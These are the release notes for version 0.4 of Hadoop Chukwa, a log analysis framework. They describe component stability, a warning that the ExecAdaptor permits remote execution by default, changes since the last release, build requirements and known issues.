Release Notes - Hadoop Chukwa - Version 0.4
This is the second public release of Chukwa, a log analysis framework on top of Hadoop. Chukwa has been tested at scale and used in some production settings, and is reasonably robust and well behaved. For instructions on setting up Chukwa, see the administration guide and the rest of the Chukwa documentation.
The collection components of Chukwa -- adaptors, agents, and collectors have been fairly aggressively tested, and can be counted on to perform properly and recover from failures.
The demux pipeline has been cleaned up somewhat, and is now documented. See the programming guide for a discussion of how to customize demux for your purposes.
HICC, the visualization component, is still "beta" quality. It's been used succesfully at multiple sites, but it's still brittle. Work is ongoing. Documentation is still sparse, and error reporting isn't always sufficiently clear.
Chukwa has not been extensively audited for security vulnerabilities. Do not run it except in trusted environments. Never run Chukwa as root: By default, the ExecAdaptor allows arbitrary remote execution.
Important changes since last release
- The collection of shell scripts in
/bin has been significantly pared down. For instance, instead of
bin/agent, you should now say
- It is now possible to disable remote connections to the Chukwa agent. This makes Chukwa more suitable for use on a customer-facing deployment.
- Chukwa now includes an adaptor for reading data via a UDP port, the
UDPAdaptor. This should facilitate integration with syslog and similar legacy tools.
There have been a number of bug fixes and code cleanups since the last release; check the changelog and JIRA for details.
- Chukwa relies on Java 1.6, and requires ant 1.7 to build.
- The back-end processing requires Hadoop 0.18+.
- Collecting Hadoop logs and metrics requires Hadoop 0.20+.
- HICC defaults to assuming data is UTC; if your machines run on local time, HICC graphs will not display properly until you change the HICC timezone. You can do this by clicking the small "gear" icon on the time selection tool.
- As mentioned in the administration guide, the pig down sampling should run as external command.
HDFSUsage script for monitoring hdfs usage in /user, this one needs to run as special hdfs user to access the data. This user should have write access to $CHUKWA_LOG_DIR.
- System metrics collection may fail or be incomplete if your versions of sar and iostat do not match the ones that Chukwa expects. (See also CHUKWA-260)
The data in a few of the chukwa agent metrics monthly, quarterly, yearly, decade tables is wrong. The recordname column holds host data, and the host column holds recordname data.